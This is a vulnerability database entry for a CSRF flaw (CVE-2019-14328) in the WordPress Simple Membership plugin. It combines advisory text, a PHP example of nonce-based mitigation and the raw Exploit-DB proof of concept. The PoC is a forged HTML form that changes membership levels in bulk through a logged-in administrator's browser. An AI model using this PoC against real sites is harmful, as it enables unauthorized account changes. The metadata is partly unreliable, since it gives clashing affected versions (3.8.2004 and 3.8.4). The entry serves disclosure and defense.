Vendor: Simple Membership
Author: rubyman
CVSS: 8.8 (HIGH)
CWE: 352 (Cross Site Request Forgery)
Product Name: Simple Membership
Affected Version From: 3.8.2004
Affected Version To: 3.8.2004
Patch Exists: NO
Related CVE: CVE-2019-14328
CPE: a:simple_membership_project:simple_membership:3.8.4
Metasploit:
Other Scripts:
Platforms Tested: Windows 8.1
Date: 2019

Cross Site Request Forgery in WordPress Simple Membership plugin

This is a cross-site request forgery: an attacker who lures a logged-in WordPress user into loading an attacker-controlled page can have that user's browser submit a forged form to the site, performing unauthorized actions on the user's behalf. Here the forged request targets the bulk membership-level change action of the WordPress Simple Membership plugin, allowing the attacker to change a user's membership level without the victim's knowledge.

Mitigation:

The vendor should release a patch that fixes this vulnerability. Users should update to the latest version of the plugin once a fix is available and ensure proper CSRF protections are in place, such as verifying a WordPress nonce on every state-changing admin action.
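As an added illustration of that mitigation (not the plugin's own code), the following hypothetical WordPress admin handler for the bulk level change accepts the request only when both a capability check and a nonce check pass; the example_swpm_* names and the hook choice are assumptions, while the WordPress functions used are real.

```php
<?php
// Added example, not Simple Membership's own code. The handler and nonce
// names are assumptions; the WordPress APIs (wp_nonce_field,
// check_admin_referer, current_user_can, absint, wp_die) are real.

// Renders the admin form. wp_nonce_field() embeds a per-user, time-limited
// token bound to the action name; an attacker's cross-site form cannot
// obtain it, so a forged POST arrives without a valid nonce.
function example_swpm_render_bulk_form() {
    echo '<form method="post">';
    wp_nonce_field( 'example_swpm_bulk_change_level', 'example_swpm_bulk_nonce' );
    echo '<input type="number" name="swpm_bulk_change_level_from" />';
    echo '<input type="number" name="swpm_bulk_change_level_to" />';
    submit_button( 'Bulk Change Membership Level', 'primary', 'swpm_bulk_change_level_process' );
    echo '</form>';
}

// Processes the POST. Both checks are needed: the capability check stops
// low-privilege users, and the nonce check stops a forged request that
// rides on an administrator's logged-in session (the CSRF case above).
function example_swpm_handle_bulk_change() {
    if ( ! isset( $_POST['swpm_bulk_change_level_process'] ) ) {
        return; // not our action
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
    }
    // Aborts with wp_die() when the nonce is missing, expired or invalid.
    check_admin_referer( 'example_swpm_bulk_change_level', 'example_swpm_bulk_nonce' );

    $from = absint( $_POST['swpm_bulk_change_level_from'] ?? 0 );
    $to   = absint( $_POST['swpm_bulk_change_level_to'] ?? 0 );
    if ( 0 === $from || 0 === $to || $from === $to ) {
        wp_die( 'Invalid membership level.', '', array( 'response' => 400 ) );
    }
    // The actual level update is plugin-specific and omitted here
    // (hypothetical); only the request validation is demonstrated.
}
add_action( 'admin_init', 'example_swpm_handle_bulk_change' );
```

With these checks in place, the PoC form below is rejected because it carries no nonce, regardless of which logged-in user submits it.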

Exploit-DB raw data:

# Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
# Date: 2019-07-27
# Exploit Author: rubyman
# Vendor Homepage: https://wordpress.org/plugins/simple-membership/
# wpvulndb : https://wpvulndb.com/vulnerabilities/9482
# Version: 3.8.4
# Tested on: Windows 8.1
# CVE : CVE-2019-14328

#
# Change localhost to your desired host
#

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;from" value="2" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;to" value="3" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;process" value="Bulk&#32;Change&#32;Membership&#32;Level" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>